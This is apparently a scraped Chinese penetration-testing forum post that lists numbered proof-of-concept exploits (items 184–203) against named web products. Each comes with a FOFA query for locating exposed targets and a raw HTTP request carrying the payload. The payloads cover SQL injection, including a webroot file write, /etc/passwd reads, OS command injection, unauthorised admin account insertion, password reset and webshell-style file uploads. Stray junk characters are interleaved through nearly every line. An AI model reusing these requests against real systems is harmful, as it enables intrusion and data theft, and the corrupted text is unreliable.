Accept-Encoding: gzip, deflate9 w6 D  d/ s0 x" W) g/ p
Connection: close4 z7 q8 {5 I! }' H
* W- s: J5 m/ c
' x9 M: n7 M# H8 Z- T0 Y1 R1 ]
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加6 H" O4 d4 C2 W
FOFA:server="SunFull-Webs"
) V) z8 V. N0 {, \' |+ z& BPOST /soap/AddUser HTTP/1.1& [" n% ~5 p1 H
Host: your-ip9 ]' P' z, j% {+ @5 N
Accept-Encoding: gzip, deflate; A4 D! B9 E6 y  I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
9 b* i2 a# D3 nAccept: application/xml, text/xml, */*; q=0.01
  n3 f5 y! ^+ g4 m7 K, y& F/ {Content-Type: text/xml; charset=utf-8
" o, B8 ?! S, R0 W* zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 v9 H. D/ e! W) {8 d2 R
X-Requested-With: XMLHttpRequest
  G' m( a% N/ a4 Q  A4 l% S3 u8 E4 D$ j: k1 C. F# w

) T5 Z5 r5 M; q0 Qinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56'), H3 Z8 ?# H! `9 P; w* h8 V

! e2 h4 z. n2 _# K9 j8 q% [' b2 @7 G5 H
185. 瑞友天翼应用虚拟化系统SQL注入( V# e& P: m; h( x- X. |1 m& n# x9 r+ k
version < 7.0.5.1% X# I. q/ S1 Z
FOFA:app="REALOR-天翼应用虚拟化系统"" _+ ~  g9 I1 w8 t0 |6 D$ P' m
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
& x; S  r4 z2 i7 H. V) wHost: host
: r$ H, n5 X; ^" R1 c! Z, }2 B9 n7 z# [. D
4 R: ?  s5 A& o
186. F-logic DataCube3 SQL注入7 f3 b/ d3 j2 V* S( M. i
CVE-2024-31750
& U2 E: ]- f8 s$ xF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统0 b: N3 m& ?8 r% Y, D
FOFA:title=="DataCube3"
, ?  {3 W1 U3 u8 g7 X; u% E* nPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1/ }# Z0 n+ L3 E' N' \
Host: your-ip
3 b3 w/ a! E0 C+ m( iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.09 I1 M/ [" x, v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
4 h; r* p9 o+ u% {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 o1 ]1 T- ~- s7 O. tAccept-Encoding: gzip, deflate* B- M2 F4 t3 M, d' o$ g2 w
Connection: close' [8 D% {9 A$ ^
Content-Type: application/x-www-form-urlencoded- i5 d% |2 |# Y) ]

, J% O$ ^) y/ B( E: U9 Nreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
) z+ O& L  X' H2 V0 e* ^4 {' G* T
8 u! O' p& S. x. L
187. Mura CMS processAsyncObject SQL注入
, ?6 m3 v( b) u' X' }. ?CVE-2024-32640
- o$ y) i0 c4 h! u% T  {, f# S) p. `FOFA:"Mura CMS"7 o4 h" s. W$ H
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
4 k. j5 e+ i; g7 ^: u2 A  X/ p  OHost: your-ip& M1 l! Y3 s7 z) X/ t/ g" b2 W& M+ ~
Content-Type: application/x-www-form-urlencoded- d- ]+ Z2 ]+ p" O; L( T3 Q/ M
+ k* Y8 ]* e) p. g- q+ H
+ k( y, t) p+ E0 g* s( N
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1, y8 t( s* {. A0 H6 _5 `; s
, b+ p- ^1 Y3 X

# m* l: l) L. e+ u1 W* J) J188. 叁体-佳会视频会议 attachment 任意文件读取
6 Z8 b( r; G) T6 M: d4 jversion <= 3.9.7# v, ?& S; f/ |9 f
FOFA:body="/system/get_rtc_user_defined_info?site_id"
$ ]" A  u0 H( B# i- V0 C: ]GET /attachment?file=/etc/passwd HTTP/1.1! D+ N3 j8 s: x
Host: your-ip0 k% {, J. C' |# s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
. Z0 U& b" S/ x; s9 K, jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& \6 [0 C$ y# v$ AAccept-Encoding: gzip, deflate
4 ?1 f3 ?8 {5 n& YAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
# u2 T4 p5 l4 P9 u: [( X# {- QConnection: close- i7 o& T, R3 v3 s6 d

5 {- A0 s$ Q5 w/ z8 ^
+ l4 O. o- l4 x+ t189. 蓝网科技临床浏览系统 deleteStudy SQL注入2 o: @5 H7 q4 u' a
FOFA:app="LANWON-临床浏览系统"- N) ]+ a8 S6 Z2 w/ n
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1( P) G. d  m$ K+ K
Host: your-ip0 X' N! m/ }9 G6 z
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36. w5 x% ?4 D6 U: G3 u) R' g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ Y# M4 R; F2 U# y
Accept-Encoding: gzip, deflate7 Y8 @& e5 J( F. Z1 g+ E
Accept-Language: zh-CN,zh;q=0.9
2 g6 P6 U2 T) O8 e+ S  x4 J* @3 sConnection: close& Z' Y' E5 ?9 a& D2 h

+ w8 }2 ^4 G5 y  _9 A9 z
9 f5 e, Y" |  e& e8 E8 c, a- L! ^4 n190. 短视频矩阵营销系统 poihuoqu 任意文件读取
8 T! d$ ]* [5 _1 h- g8 I" nFOFA:title=="短视频矩阵营销系统"" N* g& u3 U+ Y. [) n* l# [$ s
POST /index.php/admin/Userinfo/poihuoqu HTTP/27 D6 m. c6 ^" G0 X7 q, n3 D
Host: your-ip
4 S7 G9 \/ k  G& L( v5 e3 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
" S: K7 |/ G) Q8 T5 {; r+ p1 Q! d9 G/ ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9, C: K" H! B3 Q/ Y9 a  E! y
Content-Type: application/x-www-form-urlencoded
, o, C& c4 L; f' k8 iAccept-Encoding: gzip, deflate0 q! `$ i9 z6 d
Accept-Language: zh-CN,zh;q=0.9" T+ j' N8 d7 g: T  Y
, {4 q; N1 p% r9 J3 {8 i$ H
poi=file:///etc/passwd. @6 |/ ]$ _* [: Q1 Y5 J7 X
2 V* u& t" O$ m8 p; E. ]2 P2 R
* W( _8 s, [$ K3 L0 h, \+ P0 f3 ^
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
: x2 l* b, G" H9 i3 q, c4 n) L* AFOFA:body="/CDGServer3/index.jsp") {5 T% L6 _' g" ?) a) l# G$ s
POST /CDGServer3/js/../NavigationAjax HTTP/1.10 P" l2 W  v& G- N) y3 {& V
Host: your-ip3 ^& X8 z7 b/ S4 D9 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 \3 [  N1 y' K
Content-Type: application/x-www-form-urlencoded" m/ x: }5 M- ^- o: v7 W/ [

- t( [4 D4 ], [& K( R7 l3 Ucommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=9 q* @" t" e2 U, b' e6 d

/ W& a3 r7 X$ n+ B+ a
5 N2 V  v5 h* A" G# m6 C192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
6 R7 ^1 T! C/ w* ^FOFA:title="用户登录_富通天下外贸ERP"& [+ u* [  t( e+ C; D& A# W
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1" I0 V( }4 F  a- n
Host: your-ip
6 f, S8 G5 \8 r( @" `  k7 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36$ t7 N+ ?& f9 }- P# w( n; m' ~
Content-Type: application/x-www-form-urlencoded
- C5 r9 y$ L7 q
  k4 K- h2 k& {5 N7 Q+ O; h2 R7 D
0 ]/ i  [( A3 ^<% @ webhandler language="C#" class="AverageHandler" %>
" u3 d. Y" k/ ~  Y# r+ Q& tusing System;
6 S2 {+ ~9 Y3 yusing System.Web;
, C8 j2 {: z, V2 S* c$ {public class AverageHandler : IHttpHandler  X/ k8 E/ d/ @0 ]' \
{6 {; j" l# g! ]5 x2 P3 j1 B
public bool IsReusable# N3 d9 W& ^7 v3 p1 B5 h) O1 M# k
{ get { return true; } }
5 g( ~8 {. Z) P% t/ m; w2 f" Q7 Rpublic void ProcessRequest(HttpContext ctx)$ T7 h9 x- p* j0 g
{
* ~& z0 @% K5 vctx.Response.Write("test");
3 K. p8 ]8 |. M; W}
0 J# u: Q# M, i1 E: h3 a+ Y}: J* k9 E6 j$ ^5 q6 N1 Y$ i

* a3 t" P$ `7 L
4 k  @+ {' u  b0 C; E; e$ m4 o193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
3 O8 E, Y* `2 L' ]1 UFOFA:body="山石云鉴主机安全管理系统"' \; H  m& M  r7 @; [: c
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
' W/ u, \  M& iHost:
8 S$ A& D0 P4 m; F0 PCookie: PHPSESSID=2333333333333;5 L1 u& n+ Y& S8 G2 i
Content-Type: application/x-www-form-urlencoded
" }) n! s3 Q2 ?! O. r4 S" _User-Agent: Mozilla/5.0$ i' ^8 w% ~& K+ l, a2 g& G9 z9 F

2 z" O4 `& |  i9 z9 R/ _/ ?' \9 _' }
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
. ^( B! r# p2 f( L+ H: }Host:
9 P! L) v, m( p. l. O- s( M" SUser-Agent: Mozilla/5.0
4 X$ \& D" A1 L% p) ~1 i# iAccept-Encoding: gzip, deflate! C  S8 s! h% b. D' ^) m- u
Accept: */*
4 K: m+ N. b' D/ vConnection: close
0 m- G) n1 G8 U& x& z* }Cookie: PHPSESSID=2333333333333;4 Q& _; ~% Q8 O
Content-Type: application/x-www-form-urlencoded
1 I2 |& w4 V% y0 e: [Content-Length: 84
" R! `$ h. ~' l
+ h' t2 K8 s9 h" k, p: P+ Wparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
# B) x5 G) t# A7 w* v* A
2 r" S/ a/ q( v+ N& B( v6 C7 w  g
; I" r0 e% S; Z! wGET /master/img/config HTTP/1.1
) p/ c  X. l, c8 tHost:! r8 p& Q% Z2 V5 Y- x
User-Agent: Mozilla/5.05 A+ G) H3 a  D; @; j3 D- C

" p0 ^7 h+ P( B, U# M7 ?/ R0 \, o0 U7 @: @/ f6 x( o# @3 S
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
: s6 q  n- m. n& m( tFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在$ A- V7 ]5 X9 g! ]  X) t0 T  ]; K! O

0 e- H: w2 P8 c, Q( B/ h9 e5 c- D: WPOST /servlet/uploadAttachmentServlet HTTP/1.1$ z) Z7 g1 }; |
Host: host
1 b0 i) n9 @3 y# ]. [! S" z8 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36& m7 l, Z9 J( X# i: q: O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 C' y  c& u- _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ |0 z6 f7 U$ u5 r1 Z
Accept-Encoding: gzip, deflate) M' }: P) R; B2 X" _9 v+ `
Connection: close
/ ?4 ^1 e! o" a/ S( O* g2 JContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
! E/ Z2 J+ N. d------WebKitFormBoundaryKNt0t4vBe8cX9rZk/ x& p* m/ a0 k: ~* [) C& p
6 A3 t+ a8 @' n. H5 U8 Z
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"3 M% P2 \1 Z) `7 x* H6 ]/ P' k; T: V
Content-Type: text/plain! [0 N" c0 o% e, Z
<% out.println("hello");%>
2 A: y3 V# c' a$ G% f" k$ [; K------WebKitFormBoundaryKNt0t4vBe8cX9rZk5 C  x% y# ~. Q& _. T7 b$ |5 `
Content-Disposition: form-data; name="json"
8 h: e: S* L; o5 I# U {"iq":{"query":{"UpdateType":"mail"}}}
6 G: }; ~7 C7 B% G# o7 ~& H------WebKitFormBoundaryKNt0t4vBe8cX9rZk--% x5 O0 G' g  I" q2 C! C/ T+ M
! q9 m4 P; H& @
" U7 b5 t+ C( i
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行) D* j5 A/ W8 N9 o9 e
FOFA:title=="飞鱼星企业级智能上网行为管理系统9 K+ f0 U/ @/ K! |* t
POST /send_order.cgi?parameter=operation HTTP/1.1  t1 K( e* W* u7 E3 }% x
Host: 127.0.0.1
7 U- k' _* z8 rPragma: no-cache5 N0 k; t4 g+ ]8 p6 }0 v
Cache-Control: no-cache
! y; {4 f8 K7 q5 n( A* E5 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36; m, t9 o1 X) `: q
Accept: */*
  d4 l& g0 ~7 ~6 S+ IAccept-Encoding: gzip, deflate
* u4 z/ {! y7 [; p) @8 c; yAccept-Language: zh-CN,zh;q=0.92 A2 G# I0 ]! Y; x% ]
Connection: close
; |1 W/ m/ p5 C) ~. W. U, jContent-Type: application/x-www-form-urlencoded
6 M; t+ s: \  ?" cContent-Length: 681 @( a5 R1 h7 t" [" @6 W! Z# e

& K$ L: h0 Y. }$ Z0 o) F2 `8 z- x0 l{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
, [, T( z, E) w, l* c& N' v( B9 J; v3 A
. q9 ?) `- i/ J, F( i
196. 河南省风速科技统一认证平台密码重置1 f% x4 }% |9 [
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
, t8 O" P! t* p! W/ uPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1/ i; B" v( }- B& e1 \( J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+ N: m7 L- X1 {) _/ p0 M. wContent-Type: application/json;charset=UTF-8  [: _% Y6 ~: }, ]" D1 k8 M
X-Requested-With: XMLHttpRequest* A- V. C9 I* j1 u# x2 l+ q
Host:; t* E' N+ c4 j) R  W
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2, @: i* ?1 q# y. g, ~
Content-Length: 45
# U: y& S( _5 CConnection: close
. j5 x: p# T6 ^
' W, W( f- u8 `  @{"xgh":"test","newPass":"test666","email":""}( M, c/ E. f- }' N0 o; N  l; I) i

; ^. _$ B) Y) s& o# f( o( u3 `& c4 P# U: ?

9 E+ a% I2 N, H7 Z" l197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
5 r# _2 Q$ t' Q) e. \2 g) I+ SFOFA:app="浙大恩特客户资源管理系统". D4 c9 S7 V. k* @
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1; P, \+ S! @' w( {4 b  _  ?) _  ]
Host:
( V4 y9 ?/ s% \/ G* \* n& s0 cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
& }% I# [- G6 X/ F6 ^- x3 ]. WAccept-Encoding: gzip, deflate
/ w* r" p) x' ~" i& RConnection: close
  k% N5 Q: a; @% k% z9 K; u7 v' H$ |9 F7 z7 v4 f4 H3 @! {& I, e

' F5 j  d" F6 x7 `3 L' D
. p3 l4 F$ s! `- e$ ^198.  阿里云盘 WebDAV 命令注入
* v' d8 G; {  \+ _' t# I" l- DCVE-2024-29640
8 C1 e" n1 I; i, T3 i: |GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1; @- J6 H7 u: @  z1 ?5 S9 m
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64$ B1 L& V- @9 V) I& O7 i, U5 `
Accept: */*
5 o" {, o9 C3 t( a* g) nAccept-Encoding: gzip, deflate
' F5 y' E- i/ P& E* JAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6' ^$ ]6 O9 ~% \, `% K6 f) z
Connection: close# {; D% C; `6 ]3 Q$ U
2 n$ c. M& t1 g7 W

+ N; A+ u( F$ B% |- _199. cockpit系统assetsmanager_upload接口 文件上传; t( e! F. L; x2 I4 [9 d' a- T

1 O4 k3 _/ J' `$ ?! U1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:5 |0 v# ?) D" y0 }+ v
GET /auth/login?to=/ HTTP/1.1
' _: P% X( }& n3 b1 ^+ m# W4 o$ d! [. Z4 d6 ~" j
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
! P5 J3 _$ R6 J
1 k: u1 z4 S) S2 w) b+ v2.使用刚才上一步获取到的jwt获取cookie:8 G6 C9 a' f, f' P2 R
- ^6 t1 d6 O  ~0 s3 Q8 G
POST /auth/check HTTP/1.1
8 y0 _( w1 d. E9 [Content-Type: application/json6 y8 r* n5 k& C1 d( X: O9 B+ X3 K

2 |6 V- W  u" Z{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
: Q9 Q/ H7 L6 h+ U' k: P* x) B/ a: G' V
响应:200,返回值:3 q1 D9 Q, ~- x; V3 a( C
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/1 e, \, h: I4 m1 T) L! X* [  H0 ]
Fofa:title="Authenticate Please!"
) ?" Y- C* O9 J! z5 \$ pPOST /assetsmanager/upload HTTP/1.1
* W5 v% C; K$ AContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
; z/ s5 G8 Q8 z) ~1 zCookie: mysession=95524f01e238bf51bb60d77ede3bea92
9 t4 u( r( c4 s( c0 q* W  Q0 G7 B% a- C
-----------------------------36D28FBc36bd6feE7Fb3. j8 ]; Z) E! {2 J# ~4 A, m
Content-Disposition: form-data; name="files[]"; filename="tttt.php"( u. d! b& I0 S1 n+ v
Content-Type: text/php( h) K) O7 P& [$ ]. ]3 N; N
+ r& P0 _, T5 l! g9 V
<?php echo "tttt";unlink(__FILE__);?>. l2 n4 n2 _9 j7 U9 p: `4 n$ C
-----------------------------36D28FBc36bd6feE7Fb3
: r/ b/ W) H! `" `3 W/ pContent-Disposition: form-data; name="folder"! H* q4 Z  G5 k8 I

$ z/ |& M: o* E" ?3 [-----------------------------36D28FBc36bd6feE7Fb3--
3 M$ k* Z4 a( Q% O, M8 x9 S- j
# @/ n) c0 k. p$ N8 j4 F
  c# F/ P0 p, n  v/storage/uploads/tttt.php
5 _% k3 B& H* |  s) |2 W
, m( P% ~7 O& F200. SeaCMS海洋影视管理系统dmku SQL注入1 J9 i3 d6 g9 g0 N4 [% K4 X
FOFA:app="海洋CMS"' }9 T. ?  V# j% t; d0 d; Q
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.13 `9 j6 c$ J, ~  {& d
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s8 d/ k& M: a% p! c7 Y
Upgrade-Insecure-Requests: 1
2 L8 c) @' x, T* oCache-Control: max-age=0% [, O- i! U. s# t( U- p, t2 A: q/ H4 k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: r3 ~7 i5 R4 B/ X) V; L: F
Accept-Encoding: gzip, deflate+ O% |: h( j& j; K( u) i" G) q
Accept-Language: zh-CN,zh;q=0.96 ?- Y1 G( I. U- l9 q( _
; _3 r7 e4 [4 D, ^  K

$ |" j% c  e( D6 \# M) C3 o6 G& }201. 方正全媒体新闻采编系统 binary SQL注入: U5 J4 }8 w* t8 ^
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
$ \5 ^$ B/ ?* C9 dPOST /newsedit/newsplan/task/binary.do HTTP/1.1
0 X% B  A4 h# T8 M- @8 K7 B4 d' CContent-Type: application/x-www-form-urlencoded5 e5 K- d& q& s4 h8 o. r5 q2 a* D+ w% S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  L) J8 T" ?2 y6 FAccept-Encoding: gzip, deflate3 B6 R: ~, U9 U7 m- V. C8 l
Accept-Language: zh-CN,zh;q=0.9! w8 j( A, H. W+ d
Connection: close( X" K5 }) v6 R# E& M3 W" |
. {/ k7 e( T( m1 k4 @
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
7 L* J# Z5 u: z2 E' D) Z  x9 y  Y8 E- S) m/ [# H  Y
- q: ^# c9 P- P
202. 微擎系统 AccountEdit任意文件上传) X# S# ^1 t) ~$ l
FOFA:body="/Widgets/WidgetCollection/"0 o. S. a9 F9 Z# A5 W
获取__VIEWSTATE和__EVENTVALIDATION值
* g. M' B9 |3 QGET /User/AccountEdit.aspx HTTP/1.11 I: k: v" s: c" z# {6 x
Host: 滑板人之家
% }6 r! y; Y/ f8 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31# h/ `- d! P& c7 ~5 ~
Content-Length: 0$ o  ]- E1 r' ?# G# f  W9 O1 I+ k
; G9 C+ u) T- V9 J
- A$ ?+ b2 `- g& M
替换__VIEWSTATE和__EVENTVALIDATION值, D6 N3 d: L& Q/ z
POST /User/AccountEdit.aspx HTTP/1.1
$ A& w& G, B% LAccept-Encoding: gzip, deflate, br$ F4 B4 u3 T. H- W4 P: v
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687+ L" Q8 S4 t! K2 J
. k- C& R. ^+ A. A
-----------------------------786435874t38587593865736587346567358735687
  T5 ?4 m: e! F8 B6 bContent-Disposition: form-data; name="__VIEWSTATE"
7 q' F/ {# N; w) @- }6 E* `; b
7 Y# t4 F5 ^4 u3 ^! _* Q9 E__VIEWSTATE
* I. R  |% S2 l/ Z2 ~# @  g-----------------------------786435874t385875938657365873465673587356870 @- ~% W; g/ Q' U
Content-Disposition: form-data; name="__EVENTVALIDATION"
8 H8 x; `3 G+ r, A0 p/ s" X8 x$ C
0 g" _. d1 p; ~4 L* [9 {9 Z__EVENTVALIDATION
8 W! D4 \( A9 E-----------------------------786435874t38587593865736587346567358735687
5 g7 q4 O, c4 i) F" RContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"* P- M9 B8 F( F; R
Content-Type: text/plain
6 k  c9 W( ]- f9 [; c
' C) H# b/ l% H2 o% LHello World!; L2 F5 m/ D3 \+ v% p
-----------------------------786435874t38587593865736587346567358735687
5 J7 F1 g& E4 XContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
! ]0 i' W$ j' j0 |# }  i- f" D% k) I% t8 C6 a) i
上传图片% m( ?* t2 R4 z9 m/ i# z
-----------------------------786435874t38587593865736587346567358735687
% [) |% y4 O9 c- ]' C# r1 n" C/ R" SContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName". J8 Q; Q. O* b

4 T( g. _! a" N" W7 V8 I
. s' s% b) a) C7 P; J-----------------------------786435874t38587593865736587346567358735687, K5 z, I3 U5 d6 P0 d
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
. I+ o9 P+ X1 V7 W- Y1 S5 @0 u6 z; v
$ m2 D* z  c# ?' W8 l* g/ J
-----------------------------786435874t38587593865736587346567358735687--( p9 j% w, q% Q

# |7 O/ w& T) t  A* e6 M' T2 y
7 |. d2 e1 K6 {/_data/Uploads/1123.txt% V5 {/ ?) g4 V( v1 r  G, n9 \9 s
) U/ M* ^5 i- Y6 b
203. 红海云EHR PtFjk 文件上传# }: N7 Q: s1 s1 q4 D
FOFA:body="RedseaPlatform"# n  n9 o8 O( k
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.17 E7 g- [$ f9 [$ ?, I5 C& e
Host: x.x.x.x
6 C5 k7 B1 s; l1 B5 qAccept-Encoding: gzip
6 ^4 }: J( x* M( j" m! R6 CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15  `6 W4 C) n* L# U6 R: x4 g* \
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys49 a9 B$ w9 Q- Y) y& |
Content-Length: 210
4 U' n. C' @% V8 M/ j6 V* Z: F5 C* r2 e4 ]% H0 o, _2 I
------WebKitFormBoundaryt7WbDl1tXogoZys4
! Y8 Q" J& G" G( R/ [( G. h8 `$ tContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
& I0 V8 x2 l5 _6 l8 S$ ]9 q  E$ hContent-Type:image/jpeg: X6 ^; T0 |: {! g  L4 }& A( ?

4 K3 d& m; k: m0 {. v' U$ ~<% out.print("hello,eHR");%>" s) u  H9 w4 b  R' A. B
------WebKitFormBoundaryt7WbDl1tXogoZys4--
8 A# K. [! j8 c4 f0 p9 c. l! M. I% F# q6 b
8 v" ?: m) V( @- l
  {5 n( g) T1 O4 |

0 \& ]4 R. D' G
9 l2 S# s, n9 [2 [- E4 C
2 y4 x8 `) D* i5 D8 Z



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2